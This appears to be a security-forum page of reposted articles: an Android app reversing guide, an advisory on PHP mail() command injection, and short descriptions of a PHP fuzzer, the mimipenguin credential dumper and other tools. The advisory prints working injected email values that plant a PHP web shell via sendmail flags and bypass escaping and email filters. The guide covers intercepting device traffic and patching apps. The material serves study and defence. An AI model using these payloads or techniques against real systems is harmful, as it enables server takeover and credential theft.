Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 05/05/17 in all areas

  1. Încărcat pe 27 apr. 2017 by Max Bazaliy, Vlad Putin, and Alex Hude
    2 points
  2. De cand s-a inchis ClubPenguin , cei ce primesc buletin de la stat primesc si un biletel cu link-u spre registeru de aici. S-a futat sistemu'
    2 points
  3. Every day we see a bunch of new Android applications being published on the Google Play Store, from games, to utilities, to IoT devices clients and so forth, almost every single aspect of our life can be somehow controlled with “an app”. We have smart houses, smart fitness devices and smart coffee machines … but is this stuff just smart or is it secure as well? Reversing an Android application can be a (relatively) easy and fun way to answer this question, that’s why I decided to write this blog post where I’ll try to explain the basics and give you some of my “tricks” to reverse this stuff faster and more effectively. I’m not going to go very deep into technical details, you can learn yourself how Android works, how the Dalvik VM works and so forth, this is gonna be a very basic practical guide instead of a post full of theoretical stuff but no really useful contents. Let’s start! Prerequisites In order to follow this introduction to APK reversing there’re a few prerequisites: A working brain ( I don’t give this for granted anymore … ). An Android smartphone ( doh! ). You have a basic knowledge of the Java programming language (you understand it if you read it). You have the JRE installed on your computer. You have adb installed. You have the Developer Options and USB Debugging enabled on your smartphone. What is an APK? An Android application is packaged as an APK ( Android Package ) file, which is essentially a ZIP file containing the compiled code, the resources, signature, manifest and every other file the software needs in order to run. Being it a ZIP file, we can start looking at its contents using the unzip command line utility ( or any other unarchiver you use ): unzip application.apk -d application Here’s what you will find inside an APK. /AndroidManifest.xml (file) This is the binary representation of the XML manifest file describing what permissions the application will request (keep in mind that some of the permissions might be requested at runtime by the app and not declared here), what activities ( GUIs ) are in there, what services ( stuff running in the background with no UI ) and what receivers ( classes that can receive and handle system events such as the device boot or an incoming SMS ). Once decompiled (more on this later), it’ll look like this: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 <?xml version="1.0" encoding="utf-8" standalone="no"?> <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.company.appname" platformBuildVersionCode="24" platformBuildVersionName="7.0"> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> <uses-permission android:name="android.permission.INTERNET"/> <application android:allowBackup="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:supportsRtl="true" android:theme="@style/AppTheme"> <activity android:name="com.company.appname.MainActivity"> <intent-filter> <action android:name="android.intent.action.MAIN"/> <category android:name="android.intent.category.LAUNCHER"/> </intent-filter> </activity> </application> </manifest> Keep in mind that this is the perfect starting point to isolate the application “entry points”, namely the classes you’ll reverse first in order to understand the logic of the whole software. In this case for instance, we would start inspecting the com.company.appname.MainActivity class being it declared as the main UI for the application. /assets/* ( folder ) This folder will contain application specific files, like wav files the app might need to play, custom fonts and so on. Reversing-wise it’s usually not very important, unless of course you find inside the software functional references to such files. /res/* ( folder ) All the resources, like the activities xml files, images and custom styles are stored here. /resources.arsc ( file ) This is the “index” of all the resources, long story short, at each resource file is assigned a numeric identifier that the app will use in order to identify that specific entry and the resources.arsc file maps these files to their identifiers … nothing very interesting about it. /classes.dex ( file ) This file contains the Dalvik ( the virtual machine running Android applications ) bytecode of the app, let me explain it better. An Android application is (most of the times) developed using the Java programming language. The java source files are then compiled into this bytecode which the Dalvik VM eventually will execute … pretty much what happens to normal Java programs when they’re compiled to .class files. Long story short, this file contains the logic, that’s what we’re interested into. Sometimes you’ll also find a classes2.dex file, this is due to the DEX format which has a limit to the number of classes you can declare inside a single dex file, at some point in history Android apps became bigger and bigger and so Google had to adapt this format, supporting a secondary .dex file where other classes can be declared. From our perspective it doesn’t matter, the tools we’re going to use are able to detect it and append it to the decompilation pipeline. /libs/ ( folder ) Sometimes an app needs to execute native code, it can be an image processing library, a game engine or whatever. In such case, those .so ELF libraries will be found inside the libs folder, divided into architecture specific subfolders ( so the app will run on ARM, ARM64, x86, etc ). /META-INF/ ( folder ) Every Android application needs to be signed with a developer certificate in order to run on a device, even debug builds are signed by a debug certificate, the META-INF folder contains information about the files inside the APK and about the developer. Inside this folder, you’ll usually find: A MANIFEST.MF file with the SHA-1 or SHA-256 hashes of all the files inside the APK. A CERT.SF file, pretty much like the MANIFEST.MF, but signed with the RSA key. A CERT.RSA file which contains the developer public key used to sign the CERT.SF file and digests. Those files are very important in order to guarantee the APK integrity and the ownership of the code. Sometimes inspecting such signature can be very handy to determine who really developed a given APK. If you want to get information about the developer, you can use the openssl command line utility: openssl pkcs7 -in /path/to/extracted/apk/META-INF/CERT.RSA -inform DER -print This will print an output like: PKCS7: type: pkcs7-signedData (1.2.840.113549.1.7.2) d.sign: version: 1 md_algs: algorithm: sha1 (1.3.14.3.2.26) parameter: NULL contents: type: pkcs7-data (1.2.840.113549.1.7.1) d.data: <ABSENT> cert: cert_info: version: 2 serialNumber: 10394279457707717180 signature: algorithm: sha1WithRSAEncryption (1.2.840.113549.1.1.5) parameter: NULL issuer: C=TW, ST=Taiwan, L=Taipei, O=ASUS, OU=PMD, CN=ASUS AMAX Key/emailAddress=admin@asus.com validity: notBefore: Jul 8 11:39:39 2013 GMT notAfter: Nov 23 11:39:39 2040 GMT subject: C=TW, ST=Taiwan, L=Taipei, O=ASUS, OU=PMD, CN=ASUS AMAX Key/emailAddress=admin@asus.com key: algor: algorithm: rsaEncryption (1.2.840.113549.1.1.1) parameter: NULL public_key: (0 unused bits) ... ... ... This can be gold for us, for instance we could use this information to determine if an app was really signed by (let’s say) Google or if it was resigned, therefore modified, by a third party. How do I get the APK of an app? Now that we have a basic idea of what we’re supposed to find inside an APK, we need a way to actually get the APK file of the application we’re interested into. There are two ways, either you install it on your device and use adb to get it, or you use an online service to download it. Pulling an app with ADB First of all let’s plug our smartphone to the USB port of our computer and get a list of the installed packages and their namespaces: adb shell pm list packages This will list all packages on your smartphone, once you’ve found the namespace of the package you want to reverse ( com.android.systemui in this example ), let’s see what its physical path is: adb shell pm path com.android.systemui Finally, we have the APK path: package:/system/priv-app/SystemUIGoogle/SystemUIGoogle.apk Let’s pull it from the device: adb pull /system/priv-app/SystemUIGoogle/SystemUIGoogle.apk And here you go, you have the APK you want to reverse! Using an Online Service Multiple online services are available if you don’t want to install the app on your device (for instance, if you’re reversing a malware, you want to start having the file first, then installing on a clean device only afterwards), here’s a list of the ones I use: Apk-DL Evozi Downloader Apk Leecher Keep in mind that once you download the APK from these services, it’s a good idea to check the developer certificate as previously shown in order to be 100% sure you downloaded the correct APK and not some repackaged and resigned stuff full of ads and possibly malware. Network Analysis Now we start with some tests in order to understand what the app is doing while executed. My first test usually consists in inspecting the network traffic being generated by the application itself and, in order to do that, my tool of choice is bettercap … well, that’s why I developed it in the first place Make sure you have bettercap installed and that both your computer and the Android device are on the same wifi network, then you can start MITM-ing the smartphone ( 192.168.1.5 in this example ) and see its traffic in realtime from the terminal: sudo bettercap -T 192.168.1.5 -X The -X option will enable the sniffer, as soon as you start the app you should see a bunch of HTTP and/or HTTPS servers being contacted, now you know who the app is sending the data to, let’s now see what data it is sending: sudo bettercap -T 192.168.1.5 --proxy --proxy-https --no-sslstrip This will switch from passive sniffing mode, to proxying mode. All the HTTP and HTTPS traffic will be intercepted (and, if neeeded, modified) by bettercap. If the app is correctly using public key pinning (as every application should) you will not be able to see its HTTPS traffic but, unfortunately, in my experience this only happens for a very small number of apps. From now on, keep triggering actions on the app while inspecting the traffic ( you can also use Wireshark in parallel to get a PCAP capture file to inspect it later ) and after a while you should have a more or less complete idea of what protocol it’s using and for what purpose. Static Analysis After the network analysis, we collected a bunch of URLs and packets, we can use this information as our starting point, that’s what we will be looking for while performing static analysis on the app. “Static analysis” means that you will not execute the app now, but you’ll rather just study its code. Most of the times this is all you’ll ever need to reverse something. There’re different tools you can use for this purpose, let’s take a look at the most popular ones. apktool APKTool is the very first tool you want to use, it is capable of decompiling the AndroidManifest file to its original XML format, the resources.arsc file and it will also convert the classes.dex ( and classes2.dex if present ) file to an intermediary language called SMALI, an ASM-like language used to represent the Dalvik VM opcodes as a human readable language. It looks like: 1 2 3 4 5 6 7 8 .super Ljava/lang/Object; .method public static main([Ljava/lang/String;)V .registers 2 sget-object v0, Ljava/lang/System;->out:Ljava/io/PrintStream; const-string v1, "Hello World!" invoke-virtual {v0, v1}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V return-void .end method But don’t worry, in most of the cases this is not the final language you’re gonna read to reverse the app Given an APK, this command line will decompile it: apktool d application.apk Once finished, the application folder is created and you’ll find all the output of apktool in there. You can also use apktool to decompile an APK, modify it and then recompile it ( like i did with the Nike+ app in order to have more debug logs for instance ), but unless the other tools will fail the decompilation, it’s unlikely that you’ll need to read smali code in order to reverse the application, let’s get to the other tools now jADX The jADX suite allows you to simply load an APK and look at its Java source code. What’s happening under the hood is that jADX is decompiling the APK to smali and then converting the smali back to Java. Needless to say, reading Java code is much easier than reading smali as I already mentioned Once the APK is loaded, you’ll see a UI like this: One of the best features of jADX is the string/symbol search ( the button ) that will allow you to search for URLs, strings, methods and whatever you want to find inside the codebase of the app. Also, there’s the Find Usage menu option, just highlight some symbol and right click on it, this feature will give you a list of every references to that symbol. Dex2Jar and JD-Gui Similar to jADX are the dex2jar and JD-GUI tools, once installed, you’ll use dex2jar to convert an APK to a JAR file: /path/to/dex2jar/d2j-dex2jar.sh application.apk Once you have the JAR file, simply open it with JD-GUI and you’ll see its Java code, pretty much like jADX: Unfortunately JD-GUI is not as features rich as jADX, but sometimes when one tool fails you have to try another one and hope to be more lucky. JEB As your last resort, you can try the JEB decompiler. It’s a very good software, but unfortunately it’s not free, there’s a trial version if you want to give it a shot, here’s how it looks like: JEB also features an ARM disassembler ( useful when there’re native libraries in the APK ) and a debugger ( very useful for dynamic analysis ), but again, it’s not free and it’s not cheap. Static Analysis of Native Binaries As previously mentioned, sometimes you’ll find native libraries ( .so shared objects ) inside the lib folder of the APK and, while reading the Java code, you’ll find native methods declarations like the following: 1 public native String stringFromJNI(); The native keyword means that the method implementation is not inside the dex file but, instead, it’s declared and executed from native code trough what is called a Java Native Interface or JNI. Close to native methods you’ll also usually find something like this: 1 System.loadLibrary("hello-jni"); Which will tell you in which native library the method is implemented. In such cases, you will need an ARM ( or x86 if there’s a x86 subfolder inside the libs folder ) disassembler in order to reverse the native object. IDA The very first disassembler and decompiler that every decent reverser should know about is Hex-Rays IDA which is the state of the art reversing tool for native code. Along with an IDA license, you can also buy a decompiler license, in which case IDA will also be able to rebuild pseudo C-like code from the assembly, allowing you to read an higher level representation of the library logic. Unfortunately IDA is a very expensive software and, unless you’re reversing native stuff professionaly, it’s really not worth spending all those money for a single tool … warez … ehm … Hopper If you’re on a budget but you need to reverse native code, instead of IDA you can give Hopper a try. It’s definitely not as good and complete as IDA, but it’s much cheaper and will be good enough for most of the cases. Hopper supports GNU/Linux and macOS ( no Windows! ) and, just like IDA, has a builtin decompiler which is quite decent considering its price: Dynamic Analysis When static analysis is not enough, maybe because the application is obfuscated or the codebase is simply too big and complex to quickly isolate the routines you’re interested into, you need to go dynamic. Dynamic analysis simply means that you’ll execute the app ( like we did while performing network analysis ) and somehow trace into its execution using different tools, strategies and methods. Sandboxing Sandboxing is a black-box dynamic analysis strategy, which means you’re not going to actively trace into the application code ( like you do while debugging ), but you’ll execute the app into some container that will log the most relevant actions for you and will present a report at the end of the execution. Cuckoo-Droid Cuckoo-Droid is an Android port of the famous Cuckoo sandbox, once installed and configured, it’ll give you an activity report with all the URLs the app contacted, all the DNS queries, API calls and so forth: Joe Sandbox The mobile Joe Sandbox is a great online service that allows you to upload an APK and get its activity report without the hassle of installing or configuring anything. This is a sample report, as you can see the kind of information is pretty much the same as Cuckoo-Droid, plus there’re a bunch of heuristics being executed in order to behaviourally correlate the sample to other known applications. Debugging If sandboxing is not enough and you need to get deeper insights of the application behaviour, you’ll need to debug it. Debugging an app, in case you don’t know, means attaching to the running process with a debugger software, putting breakpoints that will allow you to stop the execution and inspect the memory state and step into code lines one by one in order to follow the execution graph very closely. Enabling Debug Mode When an application is compiled and eventually published to the Google Play Store, it’s usually its release build you’re looking at, meaning debugging has been disabled by the developer and you can’t attach to it directly. In order to enable debugging again, we’ll need to use apktool to decompile the app: apktool d application.apk Then you’ll need to edit the AndroidManifest.xml generated file, adding the android:debuggable="true" attribute to its application XML node: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 <?xml version="1.0" encoding="utf-8" standalone="no"?> <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.company.appname" platformBuildVersionCode="24" platformBuildVersionName="7.0"> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> <uses-permission android:name="android.permission.INTERNET"/> <application android:allowBackup="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:supportsRtl="true" android:theme="@style/AppTheme" android:debuggable="true"> <-- !!! NOTICE ME !!! --> <activity android:name="com.company.appname.MainActivity"> <intent-filter> <action android:name="android.intent.action.MAIN"/> <category android:name="android.intent.category.LAUNCHER"/> </intent-filter> </activity> </application> </manifest> Once you updated the manifest, let’s rebuild the app: apktool b -d application_path output.apk Now let’s resign it: git clone https://github.com/appium/sign java -jar sign/dist/signapk.jar sign/testkey.x509.pem sign/testkey.pk8 output.apk signed.apk And reinstall it on the device (make sure you unistalled the original version first): adb install signed.apk Now you can proceed debugging the app Android Studio Android Studio is the official Android IDE, once you have debug mode enabled for your app, you can directly attach to it using this IDE and start debugging: IDA If you have an IDA license that supports Dalvik debugging, you can attach to a running process and step trough the smali code, this document describes how to do it, but basically the idea is that you upload the ARM debugging server ( a native ARM binary ) on your device, you start it using adb and eventually you start your debugging session from IDA. Dynamic Instrumentation Dynamic instrumentation means that you want to modify the application behaviour at runtime and in order to do so you inject some “agent” into the app that you’ll eventually use to instrument it. You might want to do this in order to make the app bypass some checks ( for instance, if public key pinning is enforced, you might want to disable it with dynamic instrumentation in order to easily inspect the HTTPS traffic ), make it show you information it’s not supposed to show ( unlock “Pro” features, or debug/admin activities ), etc. Frida Frida is a great and free tool you can use to inject a whole Javascript engine into a running process on Android, iOS and many other platforms … but why Javascript? Because once the engine is injected, you can instrument the app in very cool and easy ways like this: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 from __future__ import print_function import frida import sys # let's attach to the 'hello process session = frida.attach("hello") # now let's create the Javascript we want to inject script = session.create_script(""" Interceptor.attach(ptr("%s"), { onEnter: function(args) { send(args[0].toInt32()); } }); """ % int(sys.argv[1], 16)) # this function will receive events from the js def on_message(message, data): print(message) # let's start! script.on('message', on_message) script.load() sys.stdin.read() In this example, we’re just inspecting some function argument, but there’re hundreds of things you can do with Frida, just RTFM! and use your imagination Here‘s a list of cool Frida resources, enjoy! XPosed Another option we have for instrumenting our app is using the XPosed Framework. XPosed is basically an instrumentation layer for the whole Dalvik VM which requires you to to have a rooted phone in order to install it. From XPosed wiki: There is a process that is called "Zygote". This is the heart of the Android runtime. Every application is started as a copy ("fork") of it. This process is started by an /init.rc script when the phone is booted. The process start is done with /system/bin/app_process, which loads the needed classes and invokes the initialization methods. This is where Xposed comes into play. When you install the framework, an extended app_process executable is copied to /system/bin. This extended startup process adds an additional jar to the classpath and calls methods from there at certain places. For instance, just after the VM has been created, even before the main method of Zygote has been called. And inside that method, we are part of Zygote and can act in its context. The jar is located at /data/data/de.robv.android.xposed.installer/bin/XposedBridge.jar and its source code can be found here. Looking at the class XposedBridge, you can see the main method. This is what I wrote about above, this gets called in the very beginning of the process. Some initializations are done there and also the modules are loaded (I will come back to module loading later). Once you’ve installed XPosed on your smartphone, you can start developing your own module (again, follow the project wiki), for instance, here’s an example of how you would hook the updateClock method of the SystemUI application in order to instrument it: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 package de.robv.android.xposed.mods.tutorial; import static de.robv.android.xposed.XposedHelpers.findAndHookMethod; import de.robv.android.xposed.IXposedHookLoadPackage; import de.robv.android.xposed.XC_MethodHook; import de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam; public class Tutorial implements IXposedHookLoadPackage { public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable { if (!lpparam.packageName.equals("com.android.systemui")) return; findAndHookMethod("com.android.systemui.statusbar.policy.Clock", lpparam.classLoader, "updateClock", new XC_MethodHook() { @Override protected void beforeHookedMethod(MethodHookParam param) throws Throwable { // this will be called before the clock was updated by the original method } @Override protected void afterHookedMethod(MethodHookParam param) throws Throwable { // this will be called after the clock was updated by the original method } }); } } There’re already a lot of user contributed modules you can use, study and modify for your own needs. Conclusion I hope you’ll find this reference guide useful for your Android reversing adventures, keep in mind that the most important thing while reversing is not the tool you’re using, but how you use it, so you’ll have to learn how to choose the appropriate tool for your scenario and this is something you can only learn with experience, so enough reading and start reversing! Sursa: https://www.evilsocket.net/2017/04/27/Android-Applications-Reversing-101/
    1 point
  4. Hi all, while surfing various IRC Channels, i have come across a list of very useful links, courses to get into hacking URL: https://ghostbin.com/paste/j858d There are courses for computer basics, hacking, programming and many more Good luck in your long journey of learning!
    1 point
  5. Why mail() is dangerous in PHP 3 May 2017 by Robin Peraglie During our advent of PHP application vulnerabilities, we reported a remote command execution vulnerability in the popular webmailer Roundcube (CVE-2016-9920). This vulnerability allowed a malicious user to execute arbitrary system commands on the targeted server by simply writing an email via the Roundcube interface. After we reported the vulnerability to the vendor and released our blog post, similar security vulnerabilities that base on PHP’s built-in mail()function popped up in other PHP applications 1 2 3 4. In this post, we have a look at the common ground of these vulnerabilities, which security patches are faulty, and how to use mail()securely. The PHP mail()-function PHP comes with the built-in function mail() for sending emails from a PHP application. The mail delivery can be configured by using the following five parameters. http://php.net/manual/en/function.mail.php bool mail( string $to, string $subject, string $message [, string $additional_headers [, string $additional_parameters ]] ) The first three parameters of this function are self-explanatory and less sensitive, as these are not affected by injection attacks. Still, be aware that if the to parameter can be controlled by the user, she can send spam emails to an arbitrary address. Email header injection The last two optional parameters are more concerning. The fourth parameter $additional_headers receives a string which is appended to the email header. Here, additional email headers can be specified, for example From: and Reply-To:. Since mail headers are separated by the CRLF newline character \r\n5, an attacker can use these characters to append additional email headers when user input is used unsanitized in the fourth parameter. This attack is known as Email Header Injection (or short Email Injection). It can be abused to send out multiple spam emails by adding several email addresses to an injected CC:or BCC: header. Note that some mail programs replace \n to \r\n automatically. Why the 5th parameter of mail() is extremely dangerous In order to use the mail() function in PHP, an email program or server has to be configured. The following two options can be used in the php.ini configuration file: Configure an SMTP server’s hostname and port to which PHP connects Configure the file path of a mail program that PHP uses as a Mail Transfer Agent (MTA) When PHP is configured with the second option, calls to the mail() function will result in the execution of the configured MTA program. Although PHP internally applies escapeshellcmd()to the program call which prevents an injection of new shell commands, the 5th argument $additional_parameters in mail() allows the addition of new program arguments to the MTA. Thus, an attacker can append program flags which in some MTA’s enables the creation of a file with user-controlled content. Vulnerable Code mail("myfriend@example.com", "subject", "message", "", "-f" . $_GET['from']); The code shown above is prone to a remote command execution that is easily overlooked. The GET parameter from is used unsanitized and allows an attacker to pass additional parameters to the mail program. For example, in sendmail, the parameter -O can be used to reconfigure sendmail options and the parameter -X specifies the location of a log file. Proof of Concept example@example.com -OQueueDirectory=/tmp -X/var/www/html/rce.php The proof of concept will drop a PHP shell in the web directory of the application. This file contains log information that can be tainted with PHP code. Thus, an attacker is able to execute arbitrary PHP code on the web server when accessing the rce.php file. You can find more information on how to exploit this issue in our blog post and here. Latest related security vulnerabilities The 5th parameter is indeed used in a vulnerable way in many real-world applications. The following popular PHP applications were lately found to be affected, all by the same previously described security issue (mostly reported by Dawid Golunski). Application Version Reference Roundcube <= 1.2.2 CVE-2016-9920 MediaWiki < 1.29 Discussion PHPMailer <= 5.2.18 CVE-2016-10033 Zend Framework < 2.4.11 CVE-2016-10034 SwiftMailer <= 5.4.5-DEV CVE-2016-10074 SquirrelMail <= 1.4.23 CVE-2017-7692 Due to the integration of these affected libraries, other widely used applications, such as Wordpress, Joomla and Drupal, were partly affected as well. Why escapeshellarg() is not secure PHP offers escapeshellcmd() and escapeshellarg() to secure user input used in system commands or arguments. Intuitively, the following PHP statement looks secure and prevents a break out of the -param1 parameter: system(escapeshellcmd("./program -param1 ". escapeshellarg( $_GET['arg'] ))); However, against all instincts, this statement is insecure when the program has other exploitable parameters. An attacker can break out of the -param1 parameter by injecting "foobar' -param2 payload ". After both escapeshell* functions processed this input, the following string will reach the system() function. ./program -param1 'foobar'\\'' -param2 payload \' As it can be seen from the executed command, the two nested escaping functions confuse the quoting and allow to append another parameter param2. PHP’s function mail() internally uses the escapeshellcmd() function in order to secure against command injection attacks. This is exactly why escapeshellarg() does not prevent the attack when used for the 5th parameter of mail(). The developers of Roundcube and PHPMailer implemented this faulty patch at first. Why FILTER_VALIDATE_EMAIL is not secure Another intuitive approach is to use PHP’s email filter in order to ensure that only a valid email address is used in the 5th parameter of mail(). filter_var($email, FILTER_VALIDATE_EMAIL) However, not all characters that are necessary to exploit the security issue in mail() are forbidden by this filter. It allows the usage of escaped whitespaces nested in double quotes. Due to the nature of the underlying regular expression it is possible to overlap single and double quotes and trick filter_var() into thinking we are inside of double quotes, although mail()s internal escapeshellcmd() thinks we are not. 'a."'\ -OQueueDirectory=\%0D<?=eval($_GET[c])?>\ -X/var/www/html/"@a.php For the here given url-encoded input, the filter_var() function returns true and rates the payload as a valid email address. This has a critical impact when using this function as a sole security measure: Similar as in our original attack, our malicious "email address" would cause sendmail to print the following error into our newly generated shell "@a.php in our webroot. <?=eval($_GET[c])?>\/): No such file or directory Remember that filter_var() is not appropriate to be used for user-input sanitization and was never designed for such cases, as it is too loose regarding several characters. How to use mail() securely Carefully analyze the arguments of each call to mail() in your application for the following conditions: Argument (to): Unless intended, no user input is used directly Argument (subject): Safe to use Argument (message): Safe to use Argument (headers): All \r and \n characters are stripped Argument (parameters): No user input is used In fact, there is no guaranteed safe way to use user-supplied data on shell commands and you should not try your luck. In case your application does require user input in the 5th argument, a restrictive email filter can be applied that limits any input to a minimal set of characters, even though it breaks RFC compliance. We recommend to not trust any escaping or quoting routine as history has shown these functions can or will be broken, especially when used in different environments. An alternative approach is developed by Paul Buonopane and can be found here. Summary Many PHP applications send emails to their users, for example reminders and notifications. While email header injections are widely known, a remote command execution vulnerability is rarely considered when using mail(). In this post, we have highlighted the risks of the 5th mail() parameter and how to protect against attacks that can result in full server compromise. Make sure your application uses this built-in function safely! https://phabricator.wikimedia.org/T152717 [return] https://framework.zend.com/security/advisory/ZF2016-04 [return] http://seclists.org/fulldisclosure/2017/Apr/86 [return] https://packetstormsecurity.com/files/140290/swiftmailer-exec.txt [return] http://www.ietf.org/rfc/rfc822.txt [return] Sursa: https://www.ripstech.com/blog/2017/why-mail-is-dangerous-in-php/
    1 point
  6. PHP Vulnerability Hunter Overview Overview | Screenshots | Guide | Download | Change Log PHP Vulnerability Hunter is an advanced whitebox PHP web application fuzzer that scans for several different classes of vulnerabilities via static and dynamic analysis. By instrumenting application code, PHP Vulnerability Hunter is able to achieve greater code coverage and uncover more bugs. Key Features Automated Input Mapping While most web application fuzzers rely on the user to specify application inputs, PHP vulnerability hunter uses a combination of static and dynamic analysis to automatically map the target application. Because it works by instrumenting application, PHP Vulnerability Hunter can detected inputs that are not referenced in the forms of the rendered page. Several Scan Modes PHP Vulnerability Hunter is aware of many different types of vulnerabilities found in PHP applications, from the most common such as cross-site scripting and local file inclusion to the lesser known, such as user controlled function invocation and class instantiation. PHP Vulnerability Hunter can detect the following classes of vulnerabilities: Arbitrary command execution Arbitrary file read/write/change/rename/delete Local file inclusion Arbitrary PHP execution SQL injection User controlled function invocatino User controlled class instantiation Reflected cross-site scripting (XSS) Open redirect Full path disclosure Code Coverage Get measurements of how much code was executed during a scan, broken down by scan plugin and page. Code coverage can be calculated at either the function level or the code block level. Scan Phases Initialization Phase During this phase, interesting function calls within each code file are hooked, and if code coverage is enabled the code is annotated. Static analysis is performed on the code to detect inputs. Scan Phase This is where the bugs are uncovered. PHP Vulnerability Hunter iterates through its different scan plugins and plugin modes, scanning every file within the targeted application. Each time a page is requested, dynamic analysis is performed to discover new inputs and bugs. Uninitialization Once the scan phase is complete, all of the application files are restored from backups made during the initialization phase. Link: https://www.autosectools.com/PHP-Vulnerability-Scanner
    1 point
  7. mimipenguin A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. Details Takes advantage of cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. Will attempt to calculate each word's probability by checking hashes in /etc/shadow, hashes in memory, and regex searches. Requires root permissions Supported/Tested Systems Kali 4.3.0 (rolling) x64 (gdm3) Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2) Archlinux x64 Gnome 3 (Gnome Keyring 3.20) VSFTPd 3.0.3-8+b1 (Active FTP client connections) Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions) [Gcore dependency] openssh-server 1:7.3p1-1 (Active SSH connections - sudo usage) Notes Password moves in memory - still honing in on 100% effectiveness Plan on expanding support and other credential locations Working on expanding to non-desktop environments Known bug - sometimes gcore hangs the script, this is a problem with gcore Open to pull requests and community research LDAP research (nscld winbind etc) planned for future Development Roadmap MimiPenguin is slowly being ported to multiple languages to support all possible post-exploit scenarios. The roadmap below was suggested by KINGSABRI to track the various versions and features. An "X" denotes full support while a "~" denotes a feature with known bugs. Feature .sh .py GDM password (Kali Desktop, Debian Desktop) ~ X Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) X X VSFTPd (Active FTP Connections) X X Apache2 (Active HTTP Basic Auth Sessions) ~ ~ OpenSSH (Active SSH Sessions - Sudo Usage) ~ ~ Contact Twitter: @huntergregal Website: huntergregal.com Github: huntergregal Licence CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/ Special Thanks the-useless-one for remove Gcore as a dependency, cleaning up tabs, adding output option, and a full python3 port gentilkiwi for Mimikatz, the inspiration and the twitter shoutout pugilist for cleaning up PID extraction and testing ianmiell for cleaning up some of my messy code w0rm for identifying printf error when special chars are involved benichmt1 for identifying multiple authenticate users issue ChaitanyaHaritash for identifying special char edge case issues ImAWizardLizard for cleaning up the pattern matches with a for loop coreb1t for python3 checks, arch support, other fixes n1nj4sec for a python2 port and support KINGSABRI for the Roadmap proposal bourgouinadrien for linking https://github.com/koalaman/shellcheck Link: https://github.com/huntergregal/mimipenguin
    1 point
  8. Cryptoknife Cryptoknife is an open source portable utility to allow hashing, encoding, and encryption through a simple drag-and-drop interface. It also comes with a collection of miscellaneous tools. The mainline branch officially supports Windows and Mac. Cryptoknife is free and licensed GPL v2 or later. It can be used for both commercial and personal use. Cryptoknife works by checking boxes for the calculations and then dragging files to run the calculation. Cryptoknife performs the work from every checked box on every tab and displays the output the log and saves to a log file. By default, very common hashing boxes are pre-checked. Support Twitter: @NagleCode You may also track this project on GitHub. Secure Anonymous Email: Contact me Settings and Log for Windows, the settings are saved as cryptoknife_settings.ini inside the run-time directory. The log file is cryptoknife.log is also in the run-time directory. For Mac, settings are saved in Library/Application Support/com.cryptoknife/cryptoknife_settings.ini. The log file is cryptoknife.log and is saved in your Downloads directory. Settings are saved when the app exits. The log is saved whenever the console is updated. Hashing Simply check the boxes for the algorithms to use, and then drag-and-drop your directory or file. MD5, MD4, MD2 SHA-1, 224, 256, 384, 256 CRC-32 Checksum There is also direct input available. Cryptoknife will perform all hashing algorithms on direct input. Encoding Except for line-ending conversion, Cryptoknife appends a new file extension when performing its work. However, it is still very easy to drag-and-drop and encoder/encrypt thousands of files. With great power comes great responsibility. Base64 HEX/Binary DOS/Unix EOL There is also direct input available. Results are displayed (which may not be viewable for binary results). Encryption All the encryption algorithms use CBC mode. You may supply your own Key/IV or generate a new one. Note that if you change the bit-level, you need to re-click "Generate" since different bits require different lengths. AES/Rijndael CBC Blowfish CBC Triple DES CBC Twofish CBC Utilities System profile gives a listing of RAM, processor, attached drives, and IP addresses. It is also ran on start-up. ASCII/HEX is the same conversion interface used by Packet Sender. Epoch/Date is a very common calculation used in development. Password Generator has various knobs to create a secure password. System Profile ASCII/HEX Epoch/Date convert Password Generator Using Cryptoknife, an open-source utility which generates no network traffic, is a very safe way to generate a password. Building Cryptoknife uses these libraries. https://www.cryptopp.com/ https://www.qt.io/download-open-source/ All the project files are statically-linked to create a single executable in Windows. Mac uses dynamic linking since apps are just directories. Sponsorships Would you like your name or brand listed on this website? Please contact me for sponsorship opportunities. License GPL v2 or Later. Contact me if you require a different license. Copyright Cryptoknife is wholly owned and copyright © - @NagleCode - DanNagle.com - Cryptoknife.com Link: https://github.com/dannagle/Cryptoknife
    1 point
  9. Juan CaillavaFollow Pentester at Deloitte Argentina. May 4 A Meterpreter and Windows proxy case Introduction A few months ago, while I was testing a custom APT that I developed for attack simulations in an enterprise Windows environment that allows access to Internet via proxy, I found that the HTTPs staged Meterpreter payload was behaving unexpectedly. To say the truth, at the beginning I was not sure if it was a problem related to the Meterpreter injection in memory that my APT was doing or something else. As the APT had to be prepared to deal with proxy environments, then I had to find out the exact problem and fix it. After doing a thorough analysis of the situation, I found out that the Meterpreter payload I was using (windows/meterpreter/reverse_https, Framework version: 4.12.40-dev) may not be working properly. Before starting with the technical details, I will provide data about the testing environment: Victim OS / IP: Windows 8.1 x64 Enterprise /10.x.x.189 Internet access: via an authenticated proxy (“Automatically detect settings” IE configuration / DHCP option). Proxy socket: 10.x.x.20:8080 External IP via proxy: 190.x.x.x Attacker machine: 190.y.y.y Meterpreter payload: windows/meterpreter/reverse_https Note: as a reminder, the reverse_https payload is a staged one. That is, the first code that is executed in the victim machine will download and inject in memory (via reflective injection) the actual Meterpreter 